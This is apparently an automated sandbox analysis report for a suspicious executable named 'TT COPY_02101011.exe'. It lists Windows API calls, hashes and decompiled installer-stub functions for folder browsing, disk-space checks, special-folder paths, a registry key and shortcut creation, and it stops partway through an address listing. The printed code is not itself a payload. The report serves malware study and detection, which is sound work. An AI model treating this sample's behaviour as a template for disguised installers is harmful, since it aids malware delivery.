GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
LoadBitmapA.USER32 ref: 0040469B
SetWindowLongA.USER32 ref: 004046B5
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
DeleteObject.GDI32(?), ref: 00404715
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
GetWindowLongA.USER32 ref: 0040484F
SetWindowLongA.USER32 ref: 0040485D
ShowWindow.USER32(?,00000005), ref: 0040486E
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
ImageList_Destroy.COMCTL32(?), ref: 00404A4A
GlobalFree.KERNEL32 ref: 00404A5A
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
ShowWindow.USER32(?,00000000), ref: 00404BF0
GetDlgItem.USER32 ref: 00404BFB
ShowWindow.USER32(00000000), ref: 00404C02

Strings

, xrefs: 00404BDA
M, xrefs: 004047C8
N, xrefs: 004048AC

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040411B, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x5770b8
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x571350
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x00404121
0x00404128
0x00404134
0x00404142
0x0040414a
0x0040414e
0x00404154
0x00404154
0x00404160
0x004041d4
0x004041db
0x004042b0
0x004042b7
0x004042c6
0x004042c6
0x004042ca
0x004042d0
0x004042dd
0x004042df
0x004042df
0x004042ed
0x004042f2
0x004042f5
0x004042fc
0x004042ff
0x00404336
0x00404338
0x0040433e
0x00404345
0x00404347
0x00404347
0x00404363
0x0040439f
0x00000000
0x00404365
0x00404368
0x0040437c
0x0040437e
0x00000000
0x0040437e
0x00404301
0x00404305
0x00404334
0x00404334
0x00000000
0x00000000
0x00000000
0x00000000
0x00404307
0x00404307
0x00404314
0x00404319
0x00000000
0x00000000
0x0040431d
0x0040431f
0x0040431f
0x0040432a
0x0040432d
0x00404332
0x00000000
0x00000000
0x00000000
0x00000000
0x00404332
0x0040438d
0x00404394
0x0040439b
0x004043a2
0x004043a2
0x004043a7
0x004043a9
0x004043b1
0x004043b7
0x004043b7
0x004043be
0x004043c7
0x004043d1
0x004043d9
0x004043ef
0x004043db
0x004043df
0x004043df
0x004043d9
0x004043f4
0x004043f9
0x004043fe
0x00404407
0x00404407
0x00404410
0x00404412
0x00404412
0x0040441e
0x00404426
0x00404430
0x00404430
0x00404435
0x00000000
0x00404435
0x004042ff
0x004042b9
0x004042c0
0x00000000
0x00000000
0x00000000
0x004042c0
0x004041e1
0x004041e7
0x00404201
0x00404206
0x00404210
0x00404217
0x00404226
0x00404229
0x0040422c
0x00404233
0x0040423b
0x0040423e
0x00404242
0x00404249
0x00404251
0x004042a9
0x00404253
0x00404254
0x0040425b
0x00404260
0x00404265
0x0040426d
0x0040427a
0x0040428e
0x00404292
0x00404292
0x0040428e
0x00404297
0x004042a2
0x004042a2
0x00404251
0x00000000
0x00404206
0x004041f4
0x00000000
0x00000000
0x004041fa
0x00000000
0x00404162
0x00404162
0x0040416e
0x00404178
0x00404185
0x00404185
0x0040418b
0x00404194
0x0040419d
0x004041a0
0x004041a3
0x004041ab
0x004041ae
0x004041b1
0x004041b9
0x004041c0
0x004041c7
0x0040443b
0x0040444d
0x0040444d
0x004041d2
0x00000000
0x004041d2

APIs

GetDlgItem.USER32 ref: 00404167
SetWindowTextA.USER32(?,?), ref: 00404194
SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
CoTaskMemFree.OLE32(00000000), ref: 00404254
lstrcmpiA.KERNEL32(tduolivt,00429FD8,00000000,?,?), ref: 00404286
lstrcatA.KERNEL32(?,tduolivt), ref: 00404292
SetDlgItemTextA.USER32 ref: 004042A2

Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3

Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03

GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
SetDlgItemTextA.USER32 ref: 004043EF

Strings

A, xrefs: 00404242
C:\Users\user\AppData\Local\Temp, xrefs: 0040426F
tduolivt, xrefs: 00404280, 00404285, 00404290

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$tduolivt
API String ID: 2246997448-1953168327
Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040594D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x5770b8
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x575ac0
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x73951340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}

0x0040594d
0x0040594d
0x0040594d
0x00405953
0x00405958
0x0040595a
0x00405969
0x00405969
0x0040596b
0x00405974
0x00405976
0x0040597b
0x0040597e
0x0040597f
0x00405986
0x00405988
0x0040598e
0x00405991
0x00405991
0x00405b66
0x00405b66
0x00405b6a
0x00000000
0x00000000
0x0040599e
0x004059a4
0x00000000
0x00000000
0x004059aa
0x004059ab
0x004059ae
0x004059b1
0x00405b59
0x00405b63
0x00405b65
0x00405b65
0x00405b5b
0x00405b5d
0x00405b5f
0x00405b60
0x00405b60
0x00000000
0x00405b59
0x004059b7
0x004059bb
0x004059c0
0x004059cf
0x004059d2
0x004059d4
0x004059d9
0x004059dc
0x004059df
0x004059e2
0x004059e5
0x004059e8
0x00405b03
0x00405b06
0x00405b36
0x00405b39
0x00405b3e
0x00405b42
0x00405b42
0x00405b47
0x00405b48
0x00405b4d
0x00405b50
0x00405b52
0x00000000
0x00405b52
0x00405b08
0x00405b0b
0x00405b20
0x00405b27
0x00405b0d
0x00405b14
0x00405b14
0x00405b2f
0x00405b32
0x00405afb
0x00405afc
0x00405afc
0x00000000
0x00405b32
0x004059f0
0x004059f1
0x004059f7
0x004059f9
0x00405a13
0x00405a13
0x00405a1a
0x00405a1a
0x00405a21
0x00405a25
0x00405a25
0x00405a26
0x00405a28
0x00405a61
0x00405a64
0x00405a74
0x00405a77
0x00405a7f
0x00405a85
0x00405a85
0x00405ae1
0x00405ae1
0x00405ae3
0x00000000
0x00000000
0x00405a89
0x00405a90
0x00405a91
0x00405a93
0x00405aad
0x00405abb
0x00405ac1
0x00405ac3
0x00405ade
0x00405ade
0x00405ade
0x00000000
0x00405ade
0x00405ac9
0x00405ad4
0x00405ada
0x00405adc
0x00000000
0x00000000
0x00000000
0x00405adc
0x00405a95
0x00405a98
0x00000000
0x00000000
0x00405aa7
0x00405aa9
0x00405aab
0x00000000
0x00000000
0x00000000
0x00405aab
0x00000000
0x00405ae1
0x00405a6c
0x00000000
0x00405a2a
0x00405a2f
0x00405a45
0x00405a4a
0x00405a4d
0x00405aea
0x00405aea
0x00405aee
0x00405af6
0x00405af6
0x00000000
0x00405aee
0x00405a57
0x00405ae5
0x00405ae5
0x00405ae8
0x00000000
0x00000000
0x00000000
0x00405ae8
0x00405a28
0x004059fb
0x004059ff
0x00000000
0x00000000
0x00405a01
0x00405a05
0x00000000
0x00000000
0x00405a07
0x00405a0b
0x00000000
0x00405a0d
0x00405a0d
0x00000000
0x00405a0d
0x00405a0b
0x00405b70
0x00405b7a
0x00405b86
0x00405b86
0x00000000

APIs

GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
GetSystemDirectoryA.KERNEL32(tduolivt,00000400), ref: 00405A6C
GetWindowsDirectoryA.KERNEL32(tduolivt,00000400), ref: 00405A7F
SHGetSpecialFolderLocation.SHELL32(?,0041F4C3), ref: 00405ABB
SHGetPathFromIDListA.SHELL32(0041F4C3,tduolivt), ref: 00405AC9
CoTaskMemFree.OLE32(0041F4C3), ref: 00405AD4
lstrcatA.KERNEL32(tduolivt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
lstrlenA.KERNEL32(tduolivt,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405AF0
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405A3B
tduolivt, xrefs: 00405976, 00405A39, 00405A56, 00405A6B, 00405A7E, 00405A9A, 00405AC5, 00405AF5, 00405AFB, 00405B13, 00405B26, 00405B41, 00405B47, 00405B52, 00405B7C

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$tduolivt
API String ID: 900638850-525257407
Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
HeapAlloc.KERNEL32(00000000), ref: 1000100F
RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
HeapFree.KERNEL32(00000000), ref: 1000106F

Strings

returning %p, xrefs: 1000108A

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocCreateFree
String ID: returning %p
API String ID: 3034372947-1981732286
Opcode ID: 195fbd302a5502808bbb0f915bb3c74edd391885523b5e710c5eca80e197fc54
Instruction ID: c383ed9c32cf044096f4602c524c15cf0f6a047cdac8273018d52cf608840695
Opcode Fuzzy Hash: 195fbd302a5502808bbb0f915bb3c74edd391885523b5e710c5eca80e197fc54
Instruction Fuzzy Hash: B6112174640208FFF710CFA4CD49FA977B4EB49745F208048FA09AB296C6B5EE809B54

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
